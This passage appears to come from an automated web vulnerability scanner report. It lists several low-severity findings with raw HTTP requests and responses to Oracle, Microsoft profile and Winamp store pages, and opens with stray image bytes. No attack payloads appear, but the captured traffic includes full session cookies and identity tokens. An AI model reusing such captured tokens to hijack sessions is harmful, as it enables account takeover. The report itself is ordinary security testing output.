......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

7.52. http://landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://landingpad.oracle.com
Path:   /webapps/dialogue/ns/dlgwelcome.jsp

Request

GET /webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8810727&src=6804803&Act=24 HTTP/1.1
Host: landingpad.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/pls/www/go.lp?kw=&Src=6804803&Act=24&pcode=WWMK09049794MPP029&refer=http%3A//eventreg.oracle.com/webapps/events/ns/EventsDetail.jsp%3Fp_eventId%3D117156%26src%3D6804803%26src%3D6804803%26Act%3D40
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:59 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 10495
Set-Cookie: JSESSIONID=249d795ee544549610d3612b39375f5b2166a2108afd8097a92898ad70ec11b6.e3yScheLb3mTe38NbNiNbNyQe0; path=/webapps/dialogue
Content-Type: text/html;charset=utf-8

<!-- ver 1.1 -->


<SCRIPT src="form.js" language="Javascript"></SCRIPT>

<!-- VKUMAR
<SCRIPT language='JavaScript' src='http://www.oracle.com/admin/jscripts/lib.js'></SCRIPT>
<sc
...[SNIP]...

7.53. https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://profile.microsoft.com
Path:   /RegSysProfileCenter/wizard.aspx

Request

GET /RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f HTTP/1.1
Host: profile.microsoft.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; WT_NVR_RU=0=technet:1=:2=; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; omniID=1297806178674_91c6_3334_928f_a989ebdd6d47; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1297804156157:ss=1297803748324; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/15/2011 23:09:07&Microsoft.VisitStartDate=02/15/2011 23:04:31&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=11&Microsoft.IdentityToken=tTsVV7uQ4XFTrQ4uF8xhOSlu04uSONepmxjAaCy0RF4Q1OBBe+XoPvqWI2XbbfpEFGyI70NNjyq2h7PuG2n6U9fTXkbgdkkYFh+in75Ka/C6QTy6mt6rfC5lAJ+xelXUUZhbh2s4IcllkVkyaeyOx2RF0rAM460xutxhe7V/VLgMx8OChjYJwtJfNN8sqYrGdi2GpWuektwinOmJV0YVkjMfujqWerk7cbQKdEGLoEgMPJK9gZZ4kAzy0WbfIP0kAw8EW0UkSyqpp02gtIHEYQHegESQ0rhpXRlU8U/WC66uTyYkrkDJDWOdDTnOmAJuocsmc12dHUsKw6g3XF9ehI1/6dMsmpsaJzygaVhc4K3ga10lp2qAP45pCIJULoBzl4KJb/oWr9bVbcA04UiR/SlJF4Bnp3ZECPzCNhcpMBUBwpKdvlc3+UY3Fy46zTebW288IRO57EwQz0OzCTogz6c7LUY4wleRkDfJcnTkVe0/PgVpeukU0m8uWB2xTnjDXtEA5uFUQsn2l6NysC29DdkXfna3HEPv1/as1ozCfdo=&Microsoft.MicrosoftId=0651-2120-0297-7612

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 9979
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: MicrosoftSessionCookie=Microsoft.CookieId=b90d0ff8-3af2-4cd4-bef6-aef0c7d5c10c&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.NumberOfVisits=1&SessionCookie.Id=584576586DB5665A4FD4DA9FE3A92CC6; expires=Sun, 27-Feb-2011 19:50:26 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=12&Microsoft.IdentityToken=dpnpfAbxYXP0lc3R3A1lE0O9E3yTo4q/FGMfFP4etYx91l5tRYbBqoGXqh0UGv2dfuT2X3xrtu7o+qSNgIDLX3mbtcs/v98Eq7Xg/485KvJ0N83zdWLYhA4uECKEHaDuZsrKarPZ4MTLx5Dl+ts4dFeN2azM7bKIPzfoLnLc8iFWWQjQSHRRCTuhHjfuVAOUbBljblUoMEOXMMvDKQzXeIpucdgfd/PavbnH/2XqgRBq4xSHPyYCNhqdPZQe4LZ0YBfD9WAyzplxompyyXsdu580rB23VC+mDet5Qwa4yexNb1X5MAMq6OIKIcHRLSabZex7kuHXz4eUA/LGu6eLBEzj867A9GL6rR5GvMrHgQFUKUyxhGVEpSO3im9+LpyTocPi8rtFhMHpaDoJsKGNZP0mVoCjpjCB6ubMbPhl5UUQEkxsPxm37Azrrgv/JmUkXZRo1buHeqgFIhTSzRbo9AXBUK4sJo8yunNnFzCOySMwB1dMV/MiyTDTp7wR7tY1ezZAp9fL0OJDPPgXbXiJDy/mORcybj1gyEC0UtJOS7s=&Microsoft.MicrosoftId=0651-2120-0297-7612; domain=.microsoft.com; expires=Mon, 27-Feb-2012 19:20:26 GMT; path=/
Set-Cookie: vc=vci=1; path=/
Set-Cookie: RegSysReturnUrl=https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f; domain=profile.microsoft.com; path=/
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 19:20:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="LTR">
<head>
<meta http-equiv="X-UA-Compatible" content
...[SNIP]...

7.54. https://profile.microsoft.com/regsysprofilecenter/Footer.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://profile.microsoft.com
Path:   /regsysprofilecenter/Footer.aspx

Request

GET /regsysprofilecenter/Footer.aspx?LCID=1033&WizID=345281f9-6588-4888-820f-2695af056d4f&brand=MSDN+2010&cbpage=login&mkt=EN-US&lc=1033&x=10.0.17084.0 HTTP/1.1
Host: profile.microsoft.com
Connection: keep-alive
Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1298834426&rver=6.0.5276.0&wp=MCMBI&wreply=https:%2F%2Fprofile.microsoft.com%2FRegSysProfileCenter%2Fwizard.aspx%3Fwizid%3D345281f9-6588-4888-820f-2695af056d4f&lc=1033&cb=LCID%3D1033%26WizID%3D345281f9-6588-4888-820f-2695af056d4f%26brand%3DMSDN%2B2010&id=74335
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; WT_NVR_RU=0=technet:1=:2=; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; omniID=1297806178674_91c6_3334_928f_a989ebdd6d47; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1297804156157:ss=1297803748324; MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.NumberOfVisits=1&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=12&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; vc=vci=1; RegSysReturnUrl=https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5114
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:35&Microsoft.NumberOfVisits=2&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; expires=Sun, 27-Feb-2011 19:50:35 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:35&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=13&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; domain=.microsoft.com; expires=Mon, 27-Feb-2012 19:20:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 19:20:35 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html dir="LTR">
   <head>
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
       <base target="_top" />
       <link type
...[SNIP]...

7.55. https://profile.microsoft.com/regsysprofilecenter/Header.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://profile.microsoft.com
Path:   /regsysprofilecenter/Header.aspx

Request

GET /regsysprofilecenter/Header.aspx?LCID=1033&WizID=345281f9-6588-4888-820f-2695af056d4f&brand=MSDN+2010&cbpage=login&mkt=EN-US&lc=1033&x=10.0.17084.0 HTTP/1.1
Host: profile.microsoft.com
Connection: keep-alive
Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1298834426&rver=6.0.5276.0&wp=MCMBI&wreply=https:%2F%2Fprofile.microsoft.com%2FRegSysProfileCenter%2Fwizard.aspx%3Fwizid%3D345281f9-6588-4888-820f-2695af056d4f&lc=1033&cb=LCID%3D1033%26WizID%3D345281f9-6588-4888-820f-2695af056d4f%26brand%3DMSDN%2B2010&id=74335
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; WT_NVR_RU=0=technet:1=:2=; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; omniID=1297806178674_91c6_3334_928f_a989ebdd6d47; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1297804156157:ss=1297803748324; MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.NumberOfVisits=1&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=12&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; vc=vci=1; RegSysReturnUrl=https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 7593
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:35&Microsoft.NumberOfVisits=2&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; expires=Sun, 27-Feb-2011 19:50:35 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:35&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=13&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; domain=.microsoft.com; expires=Mon, 27-Feb-2012 19:20:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 19:20:34 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html dir="LTR">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<base target="_top" />
<link rel="
...[SNIP]...

7.56. https://profile.microsoft.com/regsysprofilecenter/rps/LeftFrame.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://profile.microsoft.com
Path:   /regsysprofilecenter/rps/LeftFrame.aspx

Request

GET /regsysprofilecenter/rps/LeftFrame.aspx?LCID=1033&WizID=345281f9-6588-4888-820f-2695af056d4f&brand=MSDN+2010&cbpage=login&mkt=EN-US&lc=1033&x=10.0.17084.0 HTTP/1.1
Host: profile.microsoft.com
Connection: keep-alive
Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1298834426&rver=6.0.5276.0&wp=MCMBI&wreply=https:%2F%2Fprofile.microsoft.com%2FRegSysProfileCenter%2Fwizard.aspx%3Fwizid%3D345281f9-6588-4888-820f-2695af056d4f&lc=1033&cb=LCID%3D1033%26WizID%3D345281f9-6588-4888-820f-2695af056d4f%26brand%3DMSDN%2B2010&id=74335
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; WT_NVR_RU=0=technet:1=:2=; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; omniID=1297806178674_91c6_3334_928f_a989ebdd6d47; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1297804156157:ss=1297803748324; MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.NumberOfVisits=1&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=12&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; vc=vci=1; RegSysReturnUrl=https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2324
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:35&Microsoft.NumberOfVisits=2&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; expires=Sun, 27-Feb-2011 19:50:35 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:35&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=13&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; domain=.microsoft.com; expires=Mon, 27-Feb-2012 19:20:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 19:20:34 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html dir="LTR">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<title>
Micr
...[SNIP]...

7.57. http://shop.winamp.com/DRHM/store  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shop.winamp.com
Path:   /DRHM/store

Request

GET /DRHM/store?Action=DisplayPage&SiteID=winamp&Locale=en_US&ThemeID=1279300&Env=BASE&id=TopHeaderPopUpCssStylePage HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Referer: http://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; s_pers=%20s_getnr%3D1298934346441-Repeat%7C1362006346441%3B%20s_nrgvo%3DRepeat%7C1362006346442%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/css;charset=UTF-8
Set-Cookie: ORA_WX_SESSION="10.1.2.213:516-0#0"; path=/
Set-Cookie: JSESSIONID=229110BB701D195CFCCF3152BD66A45C; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; expires=Wed, 29-Feb-2012 04:54:25 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=67388351416,0)
Date: Mon, 28 Feb 2011 23:05:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app57
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3573678346.516.0000; path=/
Content-Length: 6616


<!-- REQUEST ID: TIME=1298934313277:NODE=c1a5702:THREAD=74 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&ceid=168713900&c
...[SNIP]...

7.58. http://shop.winamp.com/store/winamp/en_US/buy/productID.103591500/quantity.1/ThemeID.1279300  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shop.winamp.com
Path:   /store/winamp/en_US/buy/productID.103591500/quantity.1/ThemeID.1279300

Request

GET /store/winamp/en_US/buy/productID.103591500/quantity.1/ThemeID.1279300 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
